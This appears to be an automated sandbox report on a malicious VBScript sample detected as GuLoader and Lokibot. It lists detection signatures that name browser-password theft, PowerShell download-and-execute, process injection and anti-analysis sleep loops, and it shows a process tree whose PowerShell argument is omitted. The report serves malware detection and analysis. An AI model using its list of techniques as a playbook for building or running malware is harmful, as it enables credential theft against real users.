Windows
Analysis Report
Bnnebgers.vbs
Overview
General Information
Detection
GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6404 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 6648 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script argument omitted]